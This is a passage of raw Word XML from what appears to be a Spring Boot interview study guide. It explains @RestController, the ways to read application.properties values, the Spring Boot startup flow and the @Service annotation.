    </w:p>
    <w:p w14:paraId="7AF80412"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Process the incoming product data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C10DF1"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product;  // Return the created product, automatically converted to JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6440A380"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1ECD543F"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4625BA32" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3064EAAE"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stController is a specialized controller in Spring Boot for handling REST API requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8BD8DF"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t combines @Controller and @ResponseBody, automatically serializing return values to JSON or XML without the need for manual serialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520BBDAD" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4"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Ideal for creating </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RESTful web services</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that respond with data (rather than views).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B908523" w14:textId="3D273EC5"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8DC0E8E">
          <v:rect id="_x0000_i2523" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78397F70" w14:textId="1D049A7F" w:rsidR="00D05936" w:rsidRPr="00CE4B95" w:rsidRDefault="004A09A6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="587" w:name="_Toc196308067"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Which two annotations are used in built by @RestController</w:t>
      </w:r>
      <w:r w:rsidR="00D05936" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="587"/>
    </w:p>
    <w:p w14:paraId="25DF3817" w14:textId="5BA7CB89" w:rsidR="00090D06" w:rsidRPr="00D774B4" w:rsidRDefault="00090D06"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The @RestController annotation is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>composed annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that combines the following two annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F779954" w14:textId="77777777" w:rsidR="00090D06" w:rsidRPr="00D774B4" w:rsidRDefault="00090D0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Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A421697" w14:textId="77777777" w:rsidR="00090D06" w:rsidRPr="00D774B4" w:rsidRDefault="00090D06"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Marks the class as a Spring MVC controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4469680F" w14:textId="77777777" w:rsidR="00090D06" w:rsidRPr="00D774B4" w:rsidRDefault="00090D06"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Used to define web layer classes (typically returning views).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC9F30D" w14:textId="77777777" w:rsidR="00090D06" w:rsidRPr="00D774B4" w:rsidRDefault="00090D0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esponseBody</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507DE6E7" w14:textId="77777777" w:rsidR="00090D06" w:rsidRPr="00D774B4" w:rsidRDefault="00090D06"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ndicates that the return value of the methods should be written directly to the HTTP response body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09101A11" w14:textId="77777777" w:rsidR="00090D06" w:rsidRPr="00D774B4" w:rsidRDefault="00090D06"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Automatically converts the return object to JSON (or XML) using HttpMessageConverter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C4B21A" w14:textId="77777777" w:rsidR="00090D06" w:rsidRPr="00D774B4" w:rsidRDefault="00090D06"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So, @RestController = @Controller + @ResponseBody</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F16491" w14:textId="77777777" w:rsidR="00090D06" w:rsidRPr="00D774B4" w:rsidRDefault="00090D0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is means every method inside a class annotated with @RestController behaves as if it is annotated with @ResponseBody, which is ideal for REST APIs returning JSON/XML responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD29DA8" w14:textId="255FE01D"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83070AF">
          <v:rect id="_x0000_i2524" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDF3FF1" w14:textId="5AA4C59A" w:rsidR="00E215BE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E215BE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="588" w:name="_Toc196308068"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to access application.properties properties in java code?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="588"/>
    </w:p>
    <w:p w14:paraId="55BCAA6B" w14:textId="2913A74F" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0"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You can access application.properties values in Java code in Spring Boot using any of the following methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E2A4A3" w14:textId="77777777" w:rsidR="000068F0"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583F766">
          <v:rect id="_x0000_i2525" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED2CBEB" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0"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1. Using @Value Annotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E5D3E1"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application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FE52F3"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app.name=MySpringApp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C129EB"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E71D6BE"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AppConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6047FD9B"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44D90132"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Value("${app.name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540FA57E"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String appName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774CB3CD" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="549AC84A"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void printAppName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5102B2CC"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System.out.println("Application Name: " + appName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9215DF"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525DFD14"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7AC2C5D9" w14:textId="77777777" w:rsidR="000068F0"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2B6C6BE">
          <v:rect id="_x0000_i2526" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2D1104" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0"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2. Using @ConfigurationProperties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F2919B"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Used for mapping multiple properties into a POJO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C8C844"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application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B7B430"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app.name=MySpringApp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77888D52"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app.version=1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA2749B"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6034DB"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nfigurationProperties(prefix = "app")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D8612A"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AppProperties {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20147D86"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D203B7F"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String version;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68974B5B" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F32C232"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Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2950AD5D"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1717A147"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You can autowire this class wherever needed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0092E821"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDFEA78"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rivate AppProperties appProperties;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F32C514" w14:textId="77777777" w:rsidR="000068F0"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F333D4">
          <v:rect id="_x0000_i2527" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BF5A2F" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0"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3. Using Environment Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF38AF7"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1626E54F"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rivate Environment env;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D37D30A" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A805D5"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void printProperty() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F47A7E"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String appName = env.getProperty("app.name");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0C23DE"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System.out.println("App Name: " + appName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC8CB4C"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652BFFAB" w14:textId="77777777" w:rsidR="000068F0"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15180676">
          <v:rect id="_x0000_i2528" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FC33E3" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0"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24"/>
        <w:gridCol w:w="3105"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="18B3DA74" w14:textId="77777777" w:rsidTr="000068F0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D5F7377" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0"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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31DD7A91" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="79956B88" w14:textId="77777777" w:rsidTr="000068F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46D05C72"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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4277661E"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For single property</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="4B3CB216" w14:textId="77777777" w:rsidTr="000068F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="744B2A0D"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nfigurationProperties</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0299396D"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For grouped properties as POJO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="444521D3" w14:textId="77777777" w:rsidTr="000068F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7288C544"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Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0404B94B"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For dynamic/property-based logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52665B98" w14:textId="7C8C7CB4"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A6FC2AF">
          <v:rect id="_x0000_i2529" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="535B12CF" w14:textId="2A9A6545" w:rsidR="00BF0319" w:rsidRPr="00CE4B95" w:rsidRDefault="00BF0319">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="589" w:name="_Toc196308069"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Spring boot application? How does it work?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="589"/>
    </w:p>
    <w:p w14:paraId="5078B2A1" w14:textId="41AB305F" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot application</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a stand-alone, production-grade Spring-based application with minimal configuration. It simplifies Spring app development by providing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4169A00E"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Auto-configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2E2390"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Embedded web server (Tomcat/Jetty/Undertow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6117030F"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tandalone JAR deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADD35AF"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Opinionated defaults</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23614F3F" w14:textId="77777777" w:rsidR="000068F0"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120B731">
          <v:rect id="_x0000_i2530" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6729E11A" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0"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How does it work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAD8BA5"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Main Class with @SpringBootApplication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D313AE"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pringBootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A6D2C7"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MyApp {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF0EA97"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B649BF0"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SpringApplication.run(MyApp.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF3468"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6B4A5B09"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1E935FA2"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What @SpringBootApplication does:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is a combination of three annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C88AF8"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nfiguration – Marks class as source of bean definitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2687F9A7"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EnableAutoConfiguration – Enables Spring Boot’s auto-configuration mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49813FED"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mponentScan – Scans for components, configurations, and services in the current package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7E5324" w14:textId="77777777" w:rsidR="000068F0"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F2081A1">
          <v:rect id="_x0000_i2531" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F48896F" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0"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Application Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCD3CD2"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SpringApplication.run()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is invoked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A3016E"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pring Boot initializes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007ABB32" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0"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pring ApplicationContext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6C25A8" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0"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Embedded server (if web app)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ED9C95" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0"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Auto-configuration of beans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D03EE"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cans and registers all @Component, @Service, @Controller, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AC886B"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Loads properties from application.properties or application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFA4B3B"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tarts the web server (if web application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702518E2"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Application is ready to accept requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A387915" w14:textId="77777777" w:rsidR="000068F0"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D19EB7B">
          <v:rect id="_x0000_i2532" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4389F285" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0"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Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E29B4A1"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No web.xml, pom.xml can be minimal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410355F0"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No external server deployment (uses embedded server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38049CAC"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roduction-ready with metrics, health checks via Actuator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FB4D13"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Easy integration with JPA, Security, Kafka, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D29E3F2" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F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n short, Spring Boot hides boilerplate and lets developers focus on business logic with minimal setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFABFB1" w14:textId="6FFD7448"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5C7E087">
          <v:rect id="_x0000_i2533" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16893297" w14:textId="305CFBFD" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="590" w:name="_Toc196308070"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of @Service annotation in spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="590"/>
    </w:p>
    <w:p w14:paraId="25605D07" w14:textId="576A7AC5" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F20"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The @Service annotation in Spring is used to mark a class as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service provider</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>specialized form of @Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that indicates the class contains </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>business logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDDA5DD" w14:textId="77777777" w:rsidR="00B83F20"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BF0B246">
